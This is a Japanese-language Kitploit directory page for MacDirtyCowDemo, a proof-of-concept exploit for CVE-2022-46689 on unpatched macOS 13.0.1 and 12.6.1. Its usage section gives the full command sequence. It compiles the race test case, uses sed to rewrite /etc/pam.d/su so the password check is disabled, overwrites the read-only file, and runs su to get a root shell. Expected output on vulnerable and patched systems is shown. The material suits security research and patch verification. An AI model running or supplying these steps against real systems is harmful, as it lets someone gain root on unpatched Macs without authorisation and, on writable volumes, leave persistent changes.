Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
MacDirtyCowDemo — CVE-2022-46689(Dirty Cow バグの macOS 版)を利用して macOS 13.0.1 で root を取得し、Apple の XNU ソースから抽出したテストケースを使用します。 | Kitploit
ツール/GitHubGitHub/zhuowei/macdirtycowdemo
特権昇格脆弱性分析エクスプロイトペネトレーションテストレッドチーミングバイナリエクスプロイト
GitHubzhuowei/macdirtycowdemo

MacDirtyCowDemo

CVE-2022-46689(Dirty Cow バグの macOS 版)を利用して macOS 13.0.1 で root を取得し、Apple の XNU ソースから抽出したテストケースを使用します。

リポジトリを見る
4103583年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

macOS 13.0.1 で CVE-2022-46689(Dirty Cow バグの macOS 版)を使って root を取得します。Apple の XNU ソース から抽出したテストケースを使用します。

https://worthdoingbadly.com/macdirtycow/

使い方

macOS 13.0.1 / 12.6.1(またはそれ以下)のマシンで、次を実行します:

clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su

次のような出力が得られるはずです:

% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2# 

macOS 13 beta(22A5266r)でSIPをオフにしてテスト済みです(SIPがオンの場合でも動作するはずです)。

システムが完全にパッチ適用済み(macOS 13.1 / 12.6.2)の場合、代わりに次のように表示されます:

$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure

また、su を実行してもパスワードの入力を求められるはずです。

Sealed System Volume のおかげで、/System ボリューム上の任意のファイルに対してこれを実行しても、変更は一時的です。再起動すると元に戻ります。書き込み可能なボリューム上のファイルに実行すると、再起動後も変更が保持されます。

クレジット

  • Project Zero の Ian Beer 氏、この問題を発見してくれてありがとう。彼の writeup を楽しみにしています!
  • Apple、テストケースを提供してくれてありがとう。(私は何も変更していません。上書きする対象を制御するコマンドラインパラメータを追加しただけです。)
  • /etc/pam.d を使ってパスワードチェックを無効化するテクニックを提供してくれた SSLab@Gatech に感謝します。
ツールをダウンロード